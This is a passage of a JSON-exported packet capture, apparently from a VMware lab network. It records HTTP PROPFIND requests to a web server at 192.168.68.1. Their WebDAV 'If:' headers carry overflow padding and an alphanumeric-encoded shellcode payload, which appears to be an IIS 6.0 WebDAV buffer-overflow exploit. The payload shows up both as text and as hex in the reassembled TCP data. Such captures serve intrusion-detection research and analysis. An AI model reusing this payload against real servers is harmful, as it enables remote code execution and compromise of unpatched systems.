"http.request.line": "If: <http://192.168.68.1:80/wRHOZRZFVLqixOfxgmDpecgKHjWWwVZFsWtqinKAIFPwNvlqBdNdIbHrbkeaUFaDilMZLNdEShLUyEScehCfPjOOBqtcYbmPqaD<61><44><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/QbldhWPZSYIYqEMktOiAcqpaNnDaWQCulcwLgrHDFCCEwGWDVjbYdGCBSIMjiWFIbJKAYjdPpXxDXZLroleTPxmXssFkXDZnFTP<54><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "244"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.531134000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.531134000",
|
||
"frame.time_delta": "0.000061000",
|
||
"frame.time_delta_displayed": "0.006199000",
|
||
"frame.time_relative": "16.782074000",
|
||
"frame.number": "251",
|
||
"frame.len": "325",
|
||
"frame.cap_len": "325",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "311",
|
||
"ip.id": "0x0000f132",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00003f27",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "33901",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "33901",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "46",
|
||
"tcp.len": "259",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3942765843",
|
||
"tcp.nxtseq": "1708",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3443292111",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00002528",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cb:32:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cb:32:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868338",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000453000",
|
||
"tcp.analysis.bytes_in_flight": "1707",
|
||
"tcp.analysis.push_bytes_sent": "1707"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.001064000",
|
||
"tcp.time_delta": "0.000061000"
|
||
},
|
||
"tcp.payload": "42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "250",
|
||
"tcp.segment": "251",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1707",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:62:4c:48:75:62:6b:61:62:49:4d:53:48:75:64:4a:68:7a:51:59:48:67:50:6e:5a:52:6c:4f:77:56:70:63:49:44:52:58:74:62:5a:77:5a:65:61:65:4c:4c:6d:4f:42:64:6f:46:41:76:77:76:69:58:58:75:4f:6e:66:72:74:58:79:68:67:56:56:67:61:79:61:4c:67:50:48:55:6d:44:65:4b:69:71:6f:4f:67:4e:67:55:75:66:6c:6a:5a:66:68:e5:99:a8:e6:b1:b0:e4:89:b1:e6:a9:b3:e6:91:aa:e5:a5:b9:e7:91:b6:e7:a5:a8:e4:99:b5:e6:95:93:e6:95:91:e7:95:94:e5:a1:84:e5:9d:98:e6:a9:93:e7:8d:b5:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:95:9a:e4:95:b8:e5:91:b1:e6:85:8b:e4:a9:84:e5:a1:a5:e6:99:aa:e7:a9:a8:e5:9d:a8:e5:95:a6:e6:b5:ae:e5:a1:b3:e6:b5:af:e5:81:8b:e5:85:83:e5:9d:8a:e4:a1:8a:e6:85:8e:e5:99:aa:e4:a5:af:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4a:6e:79:73:75:76:52:50:68:4f:47:57:73:71:6b:42:42:64:46:63:50:7a:4e:6f:76:78:79:4f:4f:61:5a:72:79:42:4c:54:44:71:69:70:44:45:54:64:62:44:48:63:47:41:70:69:75:4f:47:77:76:4b:64:79:44:59:49:6a:46:55:6c:70:74:4b:4d:73:72:65:72:4d:56:65:56:53:51:49:51:51:55:47:75:47:7a:4c:42:6c:73:74:70:41:77:43:e6:89:99:e4:a9:b2:e4:a1:b4:e4:8d:ac:e7:9d:b6:e5:81:ba:e4:9d:ae:e4:b5:b8:e6:a9:95:e6:85:95:e5:81:8f:e4:b1:b5:e4:95:86:e7:a1:a9:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:99:a4:e6:ad:b6:e4:ad:98:e5:a1:86:e1:8f:80:e6:a0:83:e4:a9:90:e7:8d:82:e6:a9:b2:e6:8d:a3:e7:99:8a:e4:9d:99:e5:a9:b9:e4:b1:a4:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/bLHubkabIMSHudJhzQYHgPnZRlOwVpcIDRXtbZwZeaeLLmOBdoFAvwviXXuOnfrtXyhgVVgayaLgPHUmDeKiqoOgNgUufljZfh<66><68><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/JnysuvRPhOGWsqkBBdFcPzNovxyOOaZryBLTDqipDETdbDHcGApiuOGwvKdyDYIjFUlptKMsrerMVeVSQIQQUGuGzLBlstpAwC<77><43><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>